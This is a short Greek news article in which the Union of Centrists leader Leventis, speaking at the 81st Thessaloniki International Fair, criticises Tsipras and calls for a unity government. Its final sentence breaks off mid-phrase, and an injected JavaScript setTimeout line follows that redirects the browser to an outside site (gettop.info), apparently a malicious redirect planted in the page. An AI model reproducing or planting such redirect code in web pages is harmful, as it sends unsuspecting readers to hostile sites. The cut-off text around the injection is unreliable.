Λεβέντης: Ο Τσίπρας καταστρέφει και τη χώρα και τον εαυτό του

0
15

 

«Οι εκλογές δεν προαναγγέλλονται», ανέφερε ο πρόεδρος της Ένωσης Κεντρώων, απαντώντας στις ερωτήσεις των δημοσιογράφων, κατά τη διάρκεια της συνέντευξης Τύπου του στο πλαίσιο της 81ης ΔΕΘ.

«Έχω ανοίξει έναν διάλογο με τον Τσίπρα για να δω μήπως μπορέσει να καταλάβει ορισμένα πράγματα από αυτά που του λέω, όχι γιατί θέλω να μπω στην κυβέρνηση, αλλά γιατί αυτή τη στιγμή δεν διαφέρει σε τίποτα από τον κ. Σαμαρά, καταστρέφει και τη χώρα και τον εαυτό του» συμπλήρωσε ο κ. Λεβέντης προσθέτοντας ότι το ίδιο θα έκανε όποιος και αν κυβερνούσε.

«Το ένστικτο το δικό μου είναι ότι ο πρωθυπουργός έχει μπροστά του έναν Γολγοθά, πολύ δύσκολων μέτρων, τα οποία δεν θα αντέξει το κόμμα του. Με τη σημερινή του συγκρότηση, το κόμμα έχει βαρίδια, έχει ανθρώπους που δεν συμφωνούν στον ευρωπαϊκό προσανατολισμό και το γνωρίζει αυτό ο κ.Τσίπρας».

«Θα ήταν λύτρωση για τον Τσίπρα, έτσι όπως το αισθάνομαι και έτσι όπως τον ζω εγώ στις συναντήσεις που κάνω, θα ήταν λύτρωση να κάνει την «δεξιά παρένθεση». Τι θα πει «δεξιά παρένθεση;» Να πει του Μητσοτάκη «έλα να κυβερνήσεις», να τα κάνει μπάχαλο μέσα σε ένα πεντάμηνο ο κ. Μητσοτάκης, και να έχει μπροστά του εκλογές με μηδέν μπόνους».

Παράλληλα, ο πρόεδρος της Ένωσης Κεντρώων αναφέρθηκε εκ νέου στην ανάγκη οικουμενικής κυβέρνησης. Όπως είπε, επέμεινε από την πρώτη μέρα σε οικουμενική κυβέρνηση, διότι διαφορετικά επενδυτής δεν θα έρθει setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here